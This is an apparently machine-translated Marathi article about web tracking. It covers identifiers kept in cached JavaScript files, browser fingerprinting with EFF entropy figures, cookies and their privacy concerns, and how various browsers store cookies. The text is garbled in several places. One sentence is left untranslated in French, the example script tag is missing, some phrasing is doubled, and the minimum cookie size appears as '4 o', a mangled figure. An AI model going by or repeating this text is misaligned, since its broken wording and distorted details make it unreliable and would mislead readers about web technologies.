वेब पृष्ठांमध्ये JavaScript प्रोग्राम वापरून एक वेगळी यंत्रणा सामान्यतः ब्राउझर कॅशिंगवर (रीफ्रेश करण्याऐवजी मेमरीमध्ये) अवलंबून असते. 

उदाहरणार्थ, पृष्ठामध्ये टॅग असू शकतो . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

या टप्प्यावर, प्रोग्राम कॅशे मेमरीमध्ये राहतो आणि भेट दिलेले पृष्ठ दुसऱ्यांदा रीलोड केले जात नाही. परिणामी, प्रोग्राममध्ये ग्लोबल व्हेरिएबल असल्यास (उदाहरणार्थ var id = 3243242;), हा आयडेंटिफायर वैध राहतो आणि एकदा पृष्ठ पुन्हा लोड झाल्यावर किंवा प्रोग्रामला लिंक करणारे पृष्ठ लोड झाल्यावर इतर JavaScript कोडद्वारे त्याचा वापर केला जाऊ शकतो. 

या पद्धतीचा मोठा तोटा असा आहे की JavaScript ग्लोबल व्हेरिएबल स्थिर असणे आवश्यक आहे, म्हणजे ते कुकीसारखे बदलले किंवा हटवले जाऊ शकत नाही.

वेब ब्राउझर फिंगरप्रिंट

ब्राउझर फिंगरप्रिंट म्हणजे ब्राउझरच्या कॉन्फिगरेशन सेटिंग्जबद्दल ओळखीच्या उद्देशाने गोळा केलेली माहिती. या फिंगरप्रिंट्सचा वापर कुकीज अक्षम असताना देखील इंटरनेट वापरकर्ता किंवा डिव्हाइस पूर्णपणे किंवा अंशतः ओळखण्यासाठी केला जाऊ शकतो.

मानवी वेब रहदारी अचूकपणे मोजण्यासाठी आणि क्लिक फसवणुकीचे विविध प्रकार शोधण्याच्या उद्देशाने वेबसाइट प्रेक्षक सेवांद्वारे मूलभूत वेब ब्राउझर कॉन्फिगरेशन माहिती बर्याच काळापासून संकलित केली गेली आहे. क्लायंट-साइड स्क्रिप्टिंग भाषांच्या मदतीने, अधिक अचूक माहिती गोळा करणे शक्य आहे आता शक्य आहे.

ही माहिती बिट स्ट्रिंगमध्ये रूपांतरित केल्याने डिव्हाइस फिंगरप्रिंट तयार होते. 2010 मध्ये, इलेक्ट्रॉनिक फ्रंटियर फाउंडेशन (EFF) ने ब्राउझरच्या फिंगरप्रिंटची एन्ट्रॉपी मोजली 18,1 बिट, आणि कॅनव्हास फिंगरप्रिंटिंगमधील प्रगतीने त्या एन्ट्रॉपीमध्ये 5,7 बिट्स जोडण्याआधीची गोष्ट होती.

थोडक्यात कुकीज

कुकीज या वेब ब्राउझरद्वारे वेबसाइट अभ्यागताच्या हार्ड ड्राइव्हवर संग्रहित केलेल्या छोट्या मजकूर फाइल्स असतात आणि ज्या अभ्यागत किंवा साइटद्वारे त्यांच्या प्रवासाविषयी माहिती रेकॉर्ड करण्यासाठी (इतर गोष्टींबरोबरच) वापरल्या जातात. वेबमास्टर अशा प्रकारे अभ्यागताच्या सवयी ओळखू शकतो आणि प्रत्येक अभ्यागतासाठी त्याच्या साइटचे सादरीकरण वैयक्तिकृत करू शकतो; कुकीज नंतर मुख्यपृष्ठावर किती लेख प्रदर्शित करायचे किंवा कोणत्याही खाजगी पक्षासाठी लॉगिन क्रेडेन्शियल्स राखून ठेवणे शक्य करतात: जेव्हा अभ्यागत साइटवर परत येतो तेव्हा त्याला त्याचे नाव आणि संकेतशब्द टाइप करणे आवश्यक नसते. ओळखले जाईल, कारण ते कुकीमध्ये आपोआप वाचले जातात.

साइट डिझायनरने सेट केलेल्या कुकीचे आयुष्य मर्यादित असते. ते साइटवरील सत्राच्या शेवटी देखील कालबाह्य होऊ शकतात, जे ब्राउझर बंद होण्याशी संबंधित आहे. कुकीजचा वापर अभ्यागतांसाठी जीवन सुलभ करण्यासाठी आणि त्यांना अधिक संबंधित माहितीसह सादर करण्यासाठी मोठ्या प्रमाणावर केला जातो. परंतु विशेष तंत्रांमुळे अनेक साइट्सवर अभ्यागताचे अनुसरण करणे शक्य होते आणि अशा प्रकारे त्याच्या सवयींबद्दल खूप विस्तृत माहिती गोळा करणे आणि क्रॉस-चेक करणे शक्य होते. या पद्धतीमुळे कुकीजच्या वापराला अभ्यागतांच्या गोपनीयतेचे उल्लंघन करणारे पाळत ठेवण्याचे तंत्र म्हणून प्रतिष्ठा प्राप्त झाली आहे, जे दुर्दैवाने गैर-तांत्रिक कारणांसाठी किंवा वापरकर्त्याच्या अपेक्षांचा आदर न करता वापरण्याच्या अनेक प्रकरणांमध्ये वास्तविकतेशी सुसंगत आहे. .

या वैध भीतींना प्रतिसाद म्हणून, HTML 5 क्लायंट-साइड डेटा स्टोरेजसाठी वेब स्टोरेज नावाचे नवीन JavaScript API सादर करते, जे अधिक सुरक्षित आणि अधिक क्षमतेसह आहे, ज्याचा उद्देश कुकीज बदलणे आहे.

कुकीजचे स्टोरेज

काही ब्राउझरसह, कुकी सहज संपादन करण्यायोग्य आहे, नोटपॅड सारखा एक साधा मजकूर संपादक तिची मूल्ये व्यक्तिचलितपणे बदलण्यासाठी पुरेसे आहे.

ब्राउझरवर अवलंबून कुकीज वेगळ्या पद्धतीने सेव्ह केल्या जातात:

• Microsoft Internet Explorer प्रत्येक कुकी वेगळ्या फाईलमध्ये सेव्ह करते;
• फायरफॉक्स त्याच्या सर्व कुकीज एका फाईलमध्ये सेव्ह करते;
• ऑपेरा त्‍याच्‍या सर्व कुकीज एका फाईलमध्‍ये सेव्‍ह करते आणि त्‍यांना एनक्रिप्‍ट करते (सॉफ्टवेअर पर्यायांशिवाय त्या सुधारणे अशक्य);
• ऍपल सफारी त्याच्या सर्व कुकीज एकाच .plist एक्स्टेंशन फाइलमध्ये सेव्ह करते. जोपर्यंत तुम्ही सॉफ्टवेअर पर्यायांमधून जात नाही तोपर्यंत बदल करणे शक्य आहे परंतु ते सोपे नाही.

समर्थन करण्यासाठी ब्राउझर आवश्यक आहेत किमान :

• 300 एकाचवेळी कुकीज;
• 4 o प्रति कुकी;
• प्रति होस्ट किंवा डोमेन 20 कुकीज.